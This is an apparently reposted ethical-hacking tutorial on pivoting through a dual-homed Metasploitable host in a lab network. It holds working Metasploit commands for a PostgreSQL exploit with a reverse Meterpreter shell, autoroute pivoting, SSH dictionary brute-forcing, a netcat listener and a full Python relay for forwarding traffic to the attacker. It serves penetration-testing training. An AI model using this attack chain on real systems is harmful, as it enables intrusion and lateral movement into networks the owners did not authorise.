Ethical.Hacking.2021.10:PIVOTING AND PRIVILEGE ESCALATION(1)

Pivoting (pivot point; anchor point; turning point) from a Dual-Homed Device

Term: Because the firewall is connected to both the public and private networks, we refer to the machine running the firewall as a dual-homed device.


Configuring a Dual-Homed Device

We will convert the Metasploitable virtual machine into a dual-homed device and attach it to another private network containing an Ubuntu virtual machine.

Assign an IP address to the new interface by editing /etc/network/interfaces (eth0 keeps its DHCP address on the public network; eth1 gets a static address on the private network):

msfadmin@metasploitable:~$ sudo vim /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto eth0
iface eth0 inet dhcp
# The secondary network interface (private LAN)
auto eth1
iface eth1 inet static
    address 10.0.0.1
    netmask 255.255.255.0

Save the file, then bring up the eth1 interface:

msfadmin@metasploitable:~$ sudo ip link set dev eth1 up

Restart networking so the new configuration is applied:

msfadmin@metasploitable:~$ sudo /etc/init.d/networking restart

Connecting a Machine to Your Private Network

We’ll use OpenSSH to log in to the Ubuntu machine. OpenSSH is an open source implementation of an SSH server that allows users to connect to a machine using SSH. Log in to your Ubuntu virtual machine and install the OpenSSH server:

victim@ubuntu:~$ sudo apt-get install openssh-server
victim@ubuntu:~$ sudo systemctl enable ssh

Next, move the Ubuntu virtual machine onto the private network by changing its network adapter in VirtualBox to connect to the Private LAN, and give it an address in 10.0.0.0/24. The examples below assume the Ubuntu machine is 10.0.0.15; it is reachable only from the dual-homed Metasploitable host, not directly from Kali.


Pivoting with Metasploit

The Nexpose vulnerability scanner can also be run from the Metasploit console to scan the target.

Select the Postgres exploit by entering the use keyword followed by the path to the exploit. We didn’t select a payload, so Metasploit defaults to the reverse_tcp Meterpreter payload.

msf6 > use exploit/linux/postgres/postgres_payload
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.1.101
RHOSTS => 192.168.1.101
msf6 exploit(linux/postgres/postgres_payload) > run
[*] Started reverse TCP handler on 192.168.1.115:4444
[*] 192.168.1.101:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC .....
[*] Uploaded as /tmp/VfnRAqLD.so, should be cleaned up automatically
[*] Sending stage (976712 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.115:4444 -> 192.168.1.101:52575) at .....
meterpreter > run autoroute -s 10.0.0.0/24
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/postgres/postgres_payload) > back

Metasploit now routes traffic for 10.0.0.0/24 through session 1, so modules run from the console can reach hosts on the private LAN. Next, brute-force the Ubuntu SSH login over that route.

Create a file named Ubuntu_passwords.txt on your Kali Linux desktop containing the username and password of the Ubuntu machine. Each username–password pair goes on its own line, with the username and password separated by a space.

Use this file in a dictionary-based attack on the SSH server. We’ll begin by selecting Metasploit’s ssh_login module. 

msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.0.0.15
RHOSTS => 10.0.0.15
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/kali/Desktop/Ubuntu_passwords.txt
USERPASS_FILE => /home/kali/Desktop/Ubuntu_passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run

When the attack completes, you should have a shell running on the Ubuntu virtual machine. Run the following command to view a list of all your sessions:

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l

Active sessions
===============

  Id  Type                   Connection
  --  ----                   ----------
  1   meterpreter x86/linux  192.168.1.115:4444 -> 192.168.1.101:52575 (192.168.1.101)
  2   shell linux            192.168.1.115-192.168.1.101:59953 -> 10.0.0.15:22 (10.0.0.15)

Session 2 is the pivoted one: its connection is listed as Kali, via the Metasploitable host (the session-1 peer), to port 22 on the Ubuntu machine.


Writing an Attacker Proxy

On the Kali machine, start a netcat listener that will receive the relayed traffic:

kali@kali:~$ nc -lvp 5050

Copy the proxy.py file onto the Metasploitable server and run it, telling it to listen on the private interface (10.0.0.1, port 4040) and forward to the Kali listener:

msfadmin@metasploitable:~$ python3 proxy.py 10.0.0.1 4040 <Kali IP address> 5050

Then, on the Ubuntu machine, connect to the proxy:

victim@ubuntu:~$ nc 10.0.0.1 4040

Enter the phrase BOT Reporting For Duty in the Ubuntu terminal running netcat. If the proxy is working correctly, the phrase appears in the netcat terminal on your Kali Linux machine: traffic from the private LAN has been relayed through the dual-homed host to the attacker.
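The page does not show proxy.py itself. What follows is an added example of my own, not the book's or the blog's proxy.py: a small Python 3 TCP relay that takes the same four arguments as the command above (listen address, listen port, forward address, forward port) and copies bytes in both directions between each private-LAN client and the Kali listener. The demo_loopback function and its sample message are constructed for local testing on 127.0.0.1 and are assumptions, not from the original.

```python
#!/usr/bin/env python3
"""proxy.py: tiny TCP relay for pivoting (added example; not the book's proxy.py).

Usage on the dual-homed host:
    python3 proxy.py <listen_ip> <listen_port> <forward_ip> <forward_port>
e.g. python3 proxy.py 10.0.0.1 4040 192.168.1.115 5050
Everything a client on the private LAN sends to listen_ip:listen_port is
relayed to forward_ip:forward_port, and replies flow back the same way.
"""
import socket
import sys
import threading


def pipe(src, dst):
    """Copy bytes from src to dst until src hits EOF, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # tell the peer we have nothing more to send
        except OSError:
            pass


def handle(client, forward_host, forward_port):
    """Open the onward connection and relay both directions until both sides close."""
    try:
        remote = socket.create_connection((forward_host, forward_port), timeout=10)
        remote.settimeout(None)
    except OSError as exc:
        print(f"[-] cannot reach {forward_host}:{forward_port}: {exc}", file=sys.stderr)
        client.close()
        return
    up = threading.Thread(target=pipe, args=(client, remote), daemon=True)
    up.start()                 # client -> forward target
    pipe(remote, client)       # forward target -> client, on this thread
    up.join()
    client.close()
    remote.close()


def start_proxy(listen_host, listen_port, forward_host, forward_port):
    """Bind the listener, accept in a background thread, return the bound port.

    listen_port=0 lets the OS pick a free port (used by demo_loopback)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(8)

    def accept_loop():
        while True:
            try:
                client, peer = srv.accept()
            except OSError:
                return  # listener closed
            print(f"[+] {peer[0]}:{peer[1]} -> {forward_host}:{forward_port}", file=sys.stderr)
            threading.Thread(target=handle, args=(client, forward_host, forward_port),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def demo_loopback(message=b"BOT Reporting For Duty\n"):
    """Constructed self-test on 127.0.0.1: 'attacker' listener <- proxy <- 'victim' client.

    Returns (bytes the attacker side received, bytes the victim side got back)."""
    attacker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   # plays Kali's nc -lvp
    attacker.bind(("127.0.0.1", 0))
    attacker.listen(1)
    attacker.settimeout(5)
    proxy_port = start_proxy("127.0.0.1", 0, "127.0.0.1", attacker.getsockname()[1])

    victim = socket.create_connection(("127.0.0.1", proxy_port))   # plays nc 10.0.0.1 4040
    victim.sendall(message)
    victim.shutdown(socket.SHUT_WR)

    conn, _ = attacker.accept()
    conn.settimeout(5)
    got = b""
    while chunk := conn.recv(4096):
        got += chunk
    conn.sendall(b"ACK\n")     # a reply travelling the other way through the relay
    conn.close()

    victim.settimeout(5)
    reply = b""
    while chunk := victim.recv(4096):
        reply += chunk
    victim.close()
    attacker.close()
    return got, reply


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit(f"usage: {sys.argv[0]} <listen_ip> <listen_port> <forward_ip> <forward_port>")
    port = start_proxy(sys.argv[1], int(sys.argv[2]), sys.argv[3], int(sys.argv[4]))
    print(f"[*] relaying {sys.argv[1]}:{port} -> {sys.argv[3]}:{sys.argv[4]}", file=sys.stderr)
    threading.Event().wait()   # keep the process alive while daemon threads relay
```

The relay only runs while the script does, so on the pivot host start it under nohup or in a screen session if the session you used to copy it may drop. It is a plain forwarder with no authentication: anything on the private LAN that can reach 10.0.0.1:4040 is relayed to the Kali listener, which is exactly what makes it useful as a pivot and what a defender would notice as an unexpected listening port on the dual-homed host.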


Reposted from blog.csdn.net/lm19770429/article/details/121883887